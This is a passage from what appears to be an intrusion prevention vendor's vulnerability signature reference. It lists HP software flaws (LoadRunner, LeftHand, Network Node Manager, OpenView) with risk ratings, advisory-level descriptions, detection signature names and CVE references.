HP-Lefthand-Virtual-SAN-Appliance-Hydra-Diag-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in HP LeftHand Virtual SAN Appliance
Risk: High
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LeftHand Virtual SAN Appliance
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in HP LeftHand Virtual SAN Appliance. The vulnerability is due to insufficient input validation on parameters of a Diag request sent to the hydra service which listens by default on port 13838/TCP. A remote attacker can exploit this vulnerability by authenticating to the server and then sending crafted Diag requests. Successful exploitation of these vulnerabilities would lead to code execution in the security context of the affected service which is root. If the attack fails, the application may terminate abnormally.
Situation: Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-Diag-Processing-BOF
References:
CVE-2012-3283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3283
OSVDB-89917
http://www.osvdb.org/89917
Back to top

HP-Lefthand-Virtual-SAN-Appliance-Hydra-Login-Code-Execution

About this vulnerability: A vulnerability in HP LeftHand Virtual SAN Appliance
Risk: High
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LeftHand Virtual SAN Appliance
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in HP LeftHand Virtual SAN Appliance. An attacker can exploit this issue to execute arbitrary code in the context of the affected device. Failed exploit attempts will likely result in denial-of-service conditions.
Situation: Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-Login-Code-Execution
References:
CVE-2013-2343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2343
BID-60884
http://www.securityfocus.com/bid/60884
Back to top

HP-Lefthand-Virtual-SAN-Appliance-Hydra-Ping-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in HP LeftHand Virtual SAN Appliance
Risk: High
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LeftHand Virtual SAN Appliance
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in HP LeftHand Virtual SAN Appliance. The vulnerability is due to insufficient input validation on target hostname or IP address of a Ping request sent to the hydra service which listens by default on port 13838/TCP. A remote attacker can exploit this vulnerability by authenticating to the server and then sending crafted Ping requests. Successful exploitation of these vulnerabilities would lead to code execution in the security context of the affected service which is root. If the attack fails, the application may terminate abnormally.
Situation: Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-Ping-Processing-BOF
References:
CVE-2012-3285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3285
OSVDB-89919
http://www.osvdb.org/89919
Back to top

HP-Lefthand-Virtual-SAN-Appliance-Hydra-SNMP-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in HP LeftHand Virtual SAN Appliance
Risk: High
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LeftHand Virtual SAN Appliance
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in HP LeftHand Virtual SAN Appliance. The vulnerability is due to insufficient input validation on parameters of an SNMP request sent to the hydra service which listens by default on port 13838/TCP. A remote attacker can exploit this vulnerability by sending a crafted SNMP request. Successful exploitation of this vulnerability would lead to code execution in the security context of the affected service which is root. If the attack fails, the application may terminate abnormally.
Situation: Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-SNMP-Processing-BOF
References:
CVE-2012-3284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3284
OSVDB-89920
http://www.osvdb.org/89920
Back to top

HP-Linux-Imaging-And-Printing-Project-Command-Execution

About this vulnerability: An HP Linux Imaging And Printing Project Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: HP Linux Imaging And Printing Project
Type: Input Validation
Description: A vulnerability in HP Linux Imaging And Printing Project, versions 1.x and 2.x before 2.7.10, which allows remote attackers to execute arbitrary commands via shell metacharacters in the from address parameter.
Situation: Generic_CS-HP-Linux-Imaging-And-Printing-Project-Command-Execution
References:
CVE-2007-5208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5208
BID-26054
http://www.securityfocus.com/bid/26054
OSVDB-41693
http://www.osvdb.org/41693
Back to top

HP-Load-Runner-Directory-Traversal

About this vulnerability: An HP Load Runner Directory Traversal vulnerability.
Risk: High
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LoadRunner
Type: Input Validation
Description: A vulnerability in Persists XUpload ActiveX control in HP Load Runner, version 9.5, which allows remote attackers to create arbitrary files via a directory traversal in the third argument to the MakeHttpRequest method.
Situation: File-Text_HP-Load-Runner-Directory-Traversal
References:
CVE-2009-3693
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3693
OSVDB-60001
http://www.osvdb.org/60001
Back to top

HP-LoadRunner-And-Performance-Center-Libxdrutil-Mxdr_String-Heap-BOF

About this vulnerability: A vulnerability in HP LoadRunner
Risk: Moderate
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LoadRunner
Type: Buffer Overflow
Description: Insufficient length validation causes a heap buffer overflow in HPE LoadRunner. A successful exploitation allows a remote attacker to run arbitrary code on the target system with system-level privileges.
Situation: Generic_CS-HP-LoadRunner-And-Performance-Center-Libxdrutil-Mxdr_String-Heap-Buffer-Overflow
References:
CVE-2017-5789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5789
Back to top

HP-LoadRunner-Buffer-Overflow

About this vulnerability: An HP LoadRunner Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-760-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3
Software: HP LoadRunner
Type: Buffer Overflow
Description: A buffer overflow vulnerability in HP LoadRunner, versions before 11.52, in the Agent Process magentproc.exe, which allows remote attackers to execute arbitrary code.
Situation: HTTP_CS-HP-LoadRunner-Buffer-Overflow
References:
CVE-2013-4800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4800
OSVDB-95644
http://www.osvdb.org/95644
Back to top

HP-LoadRunner-Controller-Scenario-File-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP LoadRunner
Risk: Moderate
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LoadRunner
Type: Buffer Overflow
Description: A vulnerability in HP LoadRunner Controller can be exploited by sending a crafted scenario file, which causes a stack buffer overflow. This can allow an attacker to run arbitrary code on the target.
Situation: File-Text_HP-LoadRunner-Controller-Scenario-File-Stack-Buffer-Overflow
References:
CVE-2015-5426
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5426
Back to top

HP-LoadRunner-Launcher.dll-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP LoadRunner
Risk: High
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LoadRunner
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in HP LoadRunner. The vulnerability is due to insufficient validation of a length value in SSL communication with the HP LoadRunner. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable version of the software. Successful exploitation could result in execution of arbitrary code within the security context of SYSTEM. Unsuccessful attempts can cause a denial-of-service condition.
Situation: HTTPS_CS-HP-LoadRunner-Launcher.dll-Stack-Buffer-Overflow
Generic_CS-HP-LoadRunner-Launcher.dll-Stack-Buffer-Overflow
References:
CVE-2015-2110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2110
BID-74737
http://www.securityfocus.com/bid/74737
Back to top

HP-LoadRunner-Lrfileioservice-ActiveX-Control-Input-Validation-Error

About this vulnerability: A vulnerability in HP LoadRunner
Risk: Moderate
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LoadRunner
Type: Input Validation
Description: There is an input validation error in HP LoadRunner. The vulnerability is due to insufficient input validation of the WriteFileBinary() function parameters in the lrFileIOService ActiveX Control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user.
Situation: File-Text_HP-LoadRunner-Lrfileioservice-ActiveX-Input-Validation-Error
References:
CVE-2013-2370
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2370
BID-61441
http://www.securityfocus.com/bid/61441
OSVDB-95640
http://www.osvdb.org/95640
Back to top

HP-LoadRunner-Micwebajax-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP LoadRunner
Risk: Moderate
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LoadRunner
Type: Buffer Overflow
Description: An stack buffer overflow vulnerability exists in HP LoadRunner. The vulnerability is due to insufficient bounds checking on NotifyEvent method parameters. The application copies the parameters into a fixed size stack buffer, which can be overflowed. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution within security context of the target user.
Situation: File-Text_HP-LoadRunner-Micwebajax-ActiveX-Control-Stack-Buffer-Overflow
References:
CVE-2013-2368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2368
OSVDB-95639
http://www.osvdb.org/95639
Back to top

HP-LoadRunner-Virtual-User-Generator-Emulationadmin-Two-Directory-Traversal

About this vulnerability: A vulnerability in HP Virtual User Generator
Risk: Moderate
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LoadRunner
Type: Directory Traversal
Description: There are two directory traversal vulnerabilities in HP LoadRunner Virtual User Generator. The vulnerabilities exist in the EmulationAdmin web service. The vulnerabilities are due to insufficient validation on the parameters of copyFileToServer and getFileContentAsLines methods. A remote unauthenticated attacker can exploit these vulnerabilities to create arbitrary files on the server or disclose sensitive information by reading arbitrary files on the server. Successful exploitation of one of these vulnerabilities could lead to arbitrary code execution on the target system.
Situation: HTTP_CS-HP-LoadRunner-Virtual-User-Generator-Emulationadmin-Two-Directory-Traversal
References:
CVE-2013-4837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4837
OSVDB-99231
http://www.osvdb.org/99231
Back to top

HP-LoadRunner-Virtual-User-Generator-Savecoderulefile-Directory-Traversal

About this vulnerability: A vulnerability in HP Virtual User Generator
Risk: Moderate
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LoadRunner
Type: Directory Traversal
Description: There is a directory traversal vulnerability in HP LoadRunner Virtual User Generator. The vulnerability exists in the EmulationAdmin web service. The vulnerability is due to insufficient validation on the parameters of saveCodeRuleFile method sent via SOAP requests. A remote unauthenticated attacker can exploit this vulnerability to create arbitrary files on the server. Successful exploitation of the vulnerability could lead to arbitrary code execution on the target system.
Situation: HTTP_CS-HP-LoadRunner-Virtual-User-Generator-Savecoderulefile-Directory-Traversal
References:
CVE-2013-4838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4838
BID-63476
http://www.securityfocus.com/bid/63476
OSVDB-99232
http://www.osvdb.org/99232
Back to top

HP-LoadRunner-Writefilestring-Directory-Traversal

About this vulnerability: A vulnerability in HP LoadRunner
Risk: Moderate
First detected in: sgpkg-ips-541-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LoadRunner
Type: Directory Traversal
Description: There is a directory traversal and file overwrite vulnerability in HP LoadRunner. The vulnerability is caused by the WriteFileString() method which fails to validate the filename parameter. This allows the creation of new files and overwriting of system files, possibly resulting in code execution. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user.
Situation: File-Text_HP-LoadRunner-Writefilestring-Directory-Traversal
References:
CVE-2013-4798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4798
BID-61443
http://www.securityfocus.com/bid/61443
OSVDB-95642
http://www.osvdb.org/95642
Back to top

HP-LoadRunner-Xdr-Data-Handling-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in HP LoadRunner
Risk: Moderate
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LoadRunner
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in HP LoadRunner. The vulnerability is due to insufficient validation of the length of XDR encoded data. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable version of the software. Successful exploitation could result in execution of arbitrary code within the context of SYSTEM. Unsuccessful attempts can cause a denial-of-service condition.
Situation: Generic_CS-HP-LoadRunner-Xdr-Data-Handling-Heap-Buffer-Overflow
References:
CVE-2013-4799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4799
BID-61442
http://www.securityfocus.com/bid/61442
OSVDB-95643
http://www.osvdb.org/95643
Back to top

HP-LoadRunner-Xupload-ActiveX-Control-Arbitrary-File-Download

About this vulnerability: A vulnerability in HP LoadRunner
Risk: Moderate
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP LoadRunner
Type: Code Injection
Description: There is a code injection vulnerability in HP LoadRunner. The vulnerability is due to an error in the Persits.XUpload ActiveX control which can permit the download of files to arbitrary locations on the victim's computer. After successfully exploiting this vulnerability, a file on the target file system could be created, or overwritten. An attacker may write a file to the start up folder in order to execute arbitrary code during the next reboot or logon session or overwrite credential files on the system in order to gain access to the system.
Situation: HTTP_SS-HP-LoadRunner-Xupload-ActiveX-Control-Arbitrary-File-Download
File-Text_HP-LoadRunner-Xupload-ActiveX-Control-Arbitrary-File-Download
Back to top

HP-LoadRunner-Xupload-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in HP LoadRunner
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP LoadRunner
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP LoadRunner. The vulnerability is due to an error in the ActiveX control. A particular method has insufficient input validation. An exploitation may lead to arbitrary code execution in the context of the current user.
Situation: HTTP_SS-HP-LoadRunner-Xupload-ActiveX-Control-Buffer-Overflow
File-Text_HP-LoadRunner-Xupload-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-6530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6530
BID-27025
http://www.securityfocus.com/bid/27025
OSVDB-39901
http://www.osvdb.org/39901
Back to top

HP-Managed-Printing-Administration-Remote-Command-Execution

About this vulnerability: An HP Managed Printing Administration Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Managed Printing Administration
Type: Input Validation
Description: A vulnerability in HP Managed Printing Administration, versions before 2.6.4, which allows remote attackers to create arbitrary files via a directory traversal in the MPAUploader.Uploader.1.UploadFiles method.
Situation: HTTP_CSH-HP-Managed-Printing-Administration-Remote-Command-Execution
References:
CVE-2011-4166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4166
BID-51174
http://www.securityfocus.com/bid/51174
OSVDB-78015
http://www.osvdb.org/78015
Back to top

HP-Mercury-LoadRunner-Agent-Commandline-Message-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in HP Mercury LoadRunner Agent
Risk: Moderate
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Mercury LoadRunner
Type: Buffer Overflow
Description: HHewlett-Packard Mercury LoadRunner Agent and Performance Center Agent version 8.0 and 8.1, and Monitor over Firewall version 8.1 suffer from a buffer overflow vulnerability where a string from a proprietary communication protocol is copied into a fixed size buffer without length checks. The vulnerability can be used by remote attackers to execute arbitrary commands on a vulnerable host.
Situation: Generic_CS-HP-Mercury-LoadRunner-Agent-Commandline-Message-Buffer-Overflow
References:
CVE-2007-0446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0446
BID-22487
http://www.securityfocus.com/bid/22487
OSVDB-33132
http://www.osvdb.org/33132
Back to top

HP-Mercury-TestDirector-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in HP Mercury Quality Control
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Mercury Quality Control
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP Mercury Quality Control. The vulnerability is due to an error in the TestDirector ActiveX control. A particular method suffers insufficient input validation. An exploitation may lead to arbitrary code exectution in the context of the current user.
Situation: HTTP_SS-HP-Mercury-TestDirector-ActiveX-Control-Buffer-Overflow
File-Text_HP-Mercury-TestDirector-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-1819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1819
BID-23239
http://www.securityfocus.com/bid/23239
OSVDB-34317
http://www.osvdb.org/34317
Back to top

HP-Network-Node-Manager-I-Multiple-Cross-Site-Scripting-Vulnerabilities

About this vulnerability: A vulnerability in HP Network Node Manager i (NNMi)
Risk: Moderate
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Network Node Manager i
Type: Input Validation
Description: There are multiple vulnerabilities in HP Network Node Manager i (NNMi). These vulnerabilities are due to input sanitation errors during GET and POST requests. A remote, unauthenticated attacker can exploit any of these vulnerabilities to execute arbitrary script code in a target user's browser within the context of the affected site. An authenticated target user must be enticed to follow a malicious URI or open a crafted page. This could allow stealing authentication cookies and other private data.
Situation: HTTP_CRL-HP-Network-Node-Manager-I-Multiple-Cross-Site-Scripting-Vulnerabilities
References:
CVE-2011-4155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4155
BID-50635
http://www.securityfocus.com/bid/50635
OSVDB-76962
http://www.osvdb.org/76962
OSVDB-76963
http://www.osvdb.org/76963
Back to top

HP-Network-Node-Manager-I-Ovopi.dll-Buffer-Overflow

About this vulnerability: A vulnerability in HP Network Node Manager i (NNMi)
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Network Node Manager i
Type: Buffer Overflow
Description: Multiple buffer overflow vulnerabilities exist in HP Network Node Manager I (NNMi). These vulnerabilities are caused by copying user supplied data into stack-based buffers without sufficient validation in ovopi.dll. By sending a crafted request to the vulnerable product on port 696/UDP, a remote unauthenticated attacker could exploit these vulnerabilities to execute arbitrary code with System privileges.
Situation: Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-Buffer-Overflow
Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-T-Buffer-Overflow
Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-D-Buffer-Overflow
Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-P-Buffer-Overflow
References:
CVE-2014-2624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2624
OSVDB-111292
http://www.osvdb.org/111292
Back to top

HP-Network-Node-Manager-I-Ovopi.dll-Command-685-Memory-Corruption

About this vulnerability: A vulnerability in HP Network Node Manager i (NNMi)
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Network Node Manager i
Type: Buffer Overflow
Description: A memory corruption vulnerability exists in HP Network Node Manager I (NNMi). The vulnerability is caused by using remotely supplied data as a pointer without sufficient validation in ovopi.dll. By sending a crafted request to the vulnerable product on port 696/UDP, a remote unauthenticated attacker could possibly exploit this vulnerability to execute arbitrary code with System privileges.
Situation: Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-Vulnerable-Command-Usage
References:
CVE-2014-2624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2624
OSVDB-112522
http://www.osvdb.org/112522
Back to top

HP-Network-Node-Manager-I-Ovopi.dll-L-Buffer-Overflow

About this vulnerability: A vulnerability in HP Network Node Manager i (NNMi)
Risk: Moderate
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Network Node Manager i
Type: Buffer Overflow
Description: Two buffer overflow vulnerabilities exist in HP Network Node Manager I (NNMi). These vulnerabilities are caused by copying user supplied data into fixed-size buffers without sufficient validation in ovopi.dll. By sending a crafted request to the vulnerable product on port 696/UDP, a remote unauthenticated attacker could exploit these vulnerabilities to execute arbitrary code with System privileges.
Situation: Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-L-Buffer-Overflow
References:
CVE-2014-2624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2624
OSVDB-112516
http://www.osvdb.org/112516
Back to top

HP-Network-Virtualization-Storedntxfile-Directory-Traversal

About this vulnerability: A vulnerability in HP Network Virtualization
Risk: Moderate
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Network Virtualization
Type: Directory Traversal
Description: A directory traversal vulnerability exists in HP Network Virtualization software. The vulnerability is due to insufficient input validation of user parameters passed to "storedNtxFile" method. A remote, unauthenticated attacker can leverage this vulnerability to gain access to sensitive information on the vulnerable system by sending malicious GET requests to the server.
Situation: HTTP_CSU-HP-Network-Virtualization-Storedntxfile-Directory-Traversal
References:
CVE-2014-2625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2625
BID-68849
http://www.securityfocus.com/bid/68849
OSVDB-109473
http://www.osvdb.org/109473
Back to top

HP-Network-Virtualization-toServerObject-Directory-Traversal

About this vulnerability: A vulnerability in HP Network Virtualization
Risk: High
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: HP Network Virtualization
Type: Directory Traversal
Description: A directory traversal vulnerability exists in HP Network Virtualization software. The vulnerability is due to insufficient input validation of user parameters passed to "toServerObject" method. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted HTTP requests to the vulnerable service. In the event of a successful attack, arbitrary files can be created on the server leading to arbitrary code execution with SYSTEM privileges.
Situation: HTTP_CSU-HP-Network-Virtualization-toServerObject-Directory-Traversal
References:
CVE-2014-2626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2626
BID-68851
http://www.securityfocus.com/bid/68851
OSVDB-109474
http://www.osvdb.org/109474
Back to top

HP-OpenView-Application-Recovery-Manager-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Application Recovery Manager
Risk: High
First detected in: sgpkg-ips-274-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP OpenView Application Recovery Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability exists in HP OpenView Application Recovery Manager. The vulnerability is due to a boundary error when processing requests sent to the OmniInet process. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted MSG_PROTOCOL (0x010b) request to the target server, potentially causing arbitrary code injection and execution in the security context of the System user.
Situation: Generic_CS-HP-OpenView-Application-Recovery-Manager-Buffer-Overflow
References:
CVE-2009-3844
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3844
BID-37250
http://www.securityfocus.com/bid/37250
Back to top

HP-OpenView-Client-Configuration-Manager-Radia-Notify-Daemon-Code-Execution

About this vulnerability: A vulnerability in HP OpenView Client Configuration Manager
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView
Type: Malfunction
Description: There is an authentication weakness vulnerability in the Radia Notify Daemon component of HP OpenView Client Configuration Manager. The flaw is created by improper handling of user supplied data passed to the affected Radia Notify Daemon on TCP port 3465. By sending a crafted message, the attacker can execute commands within the security context of the of the Radia Notify Daemon, which is System by default. Upon a successful attack, the behaviour of the target host is entirely dependent on the intended function of the supplied executable file within the radexecd.exe install directory. The file in such a case would execute within the security context of the Radia Notify Daemon, which is System by default.
Situation: Generic_CS-HP-OpenView-Client-Configuration-Manager-Code-Execution
References:
CVE-2006-5782
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5782
Back to top

HP-OpenView-Network-Node-Manager-Command-Execution

About this vulnerability: Command execution vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-37-1210
Last changed: sgpkg-ips-1782-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Input Validation
Description: HP OpenView Network Node Manager doesn't properly validate user supplied data that is given to scripts connectedNodes.ovpl, cdpView.ovpl, freeIPaddrs.ovpl, ecscmg.ovpl. Remote attacker is able to exploit this vulnerability to execute arbitrary commands on the victim server.
Situation: HTTP_CSU-HP-OpenView-Network-Node-Manager-Command-Execution
References:
CVE-2005-1434
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1434
BID-14662
http://www.securityfocus.com/bid/14662
Back to top

HP-OpenView-Network-Node-Manager-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-268-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Network Node Manager
Type: Malfunction
Description: There is a denial of service vulnerability in HP OpenView Network Node Manager. A remote attacker can exploit this vulnerability by sending a malicious request to the affected server to cause a denial of service condition.
Situation: Generic_CS-HP-OpenView-Network-Node-Manager-Denial-Of-Service-Exploit
References:
CVE-2009-3840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3840
BID-37046
http://www.securityfocus.com/bid/37046
OSVDB-60200
http://www.osvdb.org/60200
Back to top

HP-OpenView-Network-Node-Manager-execvp_nc-BOF

About this vulnerability: An HP OpenView Network Node Manager execvp_nc BOF vulnerability
Risk: High
First detected in: sgpkg-ips-786-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability in HP OpenView Network Node Manager, version 7.53 prior to NNM_01206, in in the execvp_nc function of the ov.dll module, which allows remote attackers to execute arbitrary code via a long 'sel' parameter.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-netmon.exe-BOF
References:
CVE-2010-2703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2703
BID-41829
http://www.securityfocus.com/bid/41829
OSVDB-66514
http://www.osvdb.org/66514
Back to top

HP-OpenView-Network-Node-Manager-Getcvdata.exe-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-199-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in HP OpenView Network Node Manager. The flaw is due to a boundary error when processing HTTP requests sent to CGI program getcvdata.exe. A remote unauthenticated attacker can send a crafted HTTP request to the target host to exploit this vulnerability. Successful attack could allow for arbitrary code being injected and executed with the privileges of the affected process, normally Internet Guest Account on Windows platforms. In an attack case where code injection is not successful, the affected process will terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process, normally Internet Guest Account.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-Getcvdata.exe-BOF
References:
CVE-2008-0067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067
BID-33147
http://www.securityfocus.com/bid/33147
Back to top

HP-OpenView-Network-Node-Manager-Host-Header-BOF

About this vulnerability: A buffer overflow vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-207-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: A vulnerability exists in HP OpenView Network Node Manager software. The vulnerability is due to a boundary error while processing specially crafted HTTP requests sent to the server. Remote attackers could exploit this vulnerability to inject and execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process.
Situation: HTTP_CSH-Oversized-Host-Header-Field
References:
CVE-2008-4562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4562
BID-33668
http://www.securityfocus.com/bid/33668
Back to top

HP-OpenView-Network-Node-Manager-HTTP-Handling-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-149-2032
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP OpenView Network Node Manager. The flaw is due to a boundary error when processing overly long HTTP GET requests. A remote unauthenticated attacker can send a crafted HTTP request to the target host to exploit this vulnerability. Successful attack could allow for arbitrary code being injected and executed with the privileges of the affected service, which is normally System on Windows platforms.
Situation: HTTP_CS-HP-OpenView-Network-Node-Manager-HTTP-Handling-Buffer-Overflow
References:
CVE-2008-1697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1697
BID-28569
http://www.securityfocus.com/bid/28569
Back to top

HP-OpenView-Network-Node-Manager-Invalid-Option-Buffer-Overflow

About this vulnerability: A vulnerability in HP OpenView Network Node Manager
Risk: High
First detected in: sgpkg-ips-317-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP OpenView Network Node Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP OpenView Network Node Manager (NNM). The vulnerability is due to a boundary error when handling HTTP requests sent to the jovgraph.exe CGI application. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the security context of the Internet Guest account.
Situation: HTTP_CRL-HP-OpenView-Network-Node-Manager-Invalid-Option-Buffer-Overflow
References:
